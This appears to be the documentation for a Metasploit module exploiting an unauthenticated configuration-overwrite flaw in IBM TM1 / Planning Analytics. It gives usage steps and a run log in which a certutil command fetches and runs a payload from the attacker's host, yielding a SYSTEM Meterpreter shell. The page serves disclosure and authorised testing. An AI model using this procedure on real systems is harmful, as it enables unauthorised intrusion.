## Vulnerable Application

### Description

This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows an unauthenticated attacker to perform a configuration overwrite.
It starts by querying the Admin server for the available applications, picks one, and then exploits it. You can also provide an application name to bypass this step, and exploit the application directly.
The configuration overwrite is used to change an application server authentication method to "CAM", a proprietary IBM auth method, which is simulated by the exploit.
The exploit then performs a fake authentication as admin, and finally abuses TM1 scripting to perform a command injection as root or SYSTEM.

This module starts by querying the Admin server, which usually runs on port 5498 with SSL enabled, or 5495 without SSL. This can be queried by a normal client without authentication, and with that we retrieve a list of applications, the servers where they are running, the ports where they are running, and if they use SSL or not.

Note that there might be cases where the applications do not run on the same host as the Admin server; however this is expected to be rare. Even in that case, the exploit should work perfectly, as it uses the information from the Admin server to connect to the Application server host, and automatically sets up SSL if needed.

If you know the application name, port and SSL status, you can enter this directly into the exploit, which then will not perform the Admin server query. For this, enter the application port in the `RPORT` option, whether it uses SSL in the `SSL` option, and finally set `APP_NAME` to the application name.

Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux.

Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).

Users are encouraged to share success stories with the module author, Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security. For more information, check the full advisory at https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_tm1_rce.md.

### Setup

To obtain the vulnerable application you need an official IBM installer for IBM Planning Analytics or IBM TM1. This exploit works perfectly for both Windows and Linux targets.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use [module path]```
4. Do: ```set srvhost [lhost]```
5. Do: ```set target [0|1]```
6. Do: ```set rhost [rhost]```
7. Do: ```run```
8. You should get a shell.

## Options

### SSL

Whether to use SSL to connect to the Admin / Application server (default true)

### APP_NAME

Application name to use to connect directly, bypassing Admin server query (default unset).

### AUTH_ATTEMPTS

Number of attempts to authentication to the fake CAM server (default 10).

## Scenarios

```
[*] Started reverse TCP handler on 192.168.1.1:4444
[*] 192.168.1.138:5498 - Connecting to admin server and obtaining application data
[+] 192.168.1.138:5498 - Found app GO_New_Stores tcp ip: 192.168.1.138 port: 45557 available: 1 SSL: 1
[+] 192.168.1.138:5498 - Found app GO_Scorecards tcp ip: 192.168.1.138 port: 54321 available: 1 SSL: 1
[+] 192.168.1.138:5498 - Found app Planning Sample tcp ip: 192.168.1.138 port: 12345 available: 1 SSL: 1
[+] 192.168.1.138:5498 - Found app proven_techniques tcp ip: 192.168.1.138 port: 17797 available: 1 SSL: 1
[+] 192.168.1.138:5498 - Found app SData tcp ip: 192.168.1.138 port: 12346 available: 1 SSL: 1
[*] 192.168.1.138:5498 - Picked SData as our target, connecting...
[+] 192.168.1.138:5498 - Current auth method is 1, we're good to go!
[*] 192.168.1.138:5498 - Starting up the fake CAM server...
[*] 192.168.1.138:5498 - Using URL: http://192.168.1.1:4466/
[*] 192.168.1.138:5498 - Changing authentication method to 4 (CAM auth)
[*] 192.168.1.138:5498 - Authenticating using CAM Passport and our fake CAM Service...
[+] 192.168.1.138:5498 - CAM: Received first CAM query, responding with account info
[+] 192.168.1.138:5498 - CAM: Received second CAM query, responding with session info
[+] 192.168.1.138:5498 - CAM: Received third CAM query, responding with random garbage
[*] 192.168.1.138:5498 - Creating our Process object...
[*] 192.168.1.138:5498 - Adding command :"certutil.exe -urlcache -split -f http://192.168.1.1:4466/ C:\Windows\Temp\KWFUmh.exe" to the Process object...
[*] 192.168.1.138:5498 - Adding command :"C:\Windows\Temp\KWFUmh.exe" to the Process object...
[*] 192.168.1.138:5498 - Registering the Process object under the name 'cRKnsLzFFwDI'
[*] 192.168.1.138:5498 - Now let's execute the Process object!
[+] 192.168.1.138:5498 - CAM: Received request for payload executable, shell incoming!
[+] 192.168.1.138:5498 - CAM: Received request for payload executable, shell incoming!
[*] Sending stage (180291 bytes) to 192.168.1.138
[*] Meterpreter session 6 opened (192.168.1.1:4444 -> 192.168.1.138:49306) at 2020-03-27 12:24:55 +0700
[*] 192.168.1.138:5498 - Restoring original authentication method 1
[*] 192.168.1.138:5498 - Server stopped.
[!] 192.168.1.138:5498 - This exploit may require manual cleanup of 'C:\Windows\Temp\KWFUmh.exe' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
```
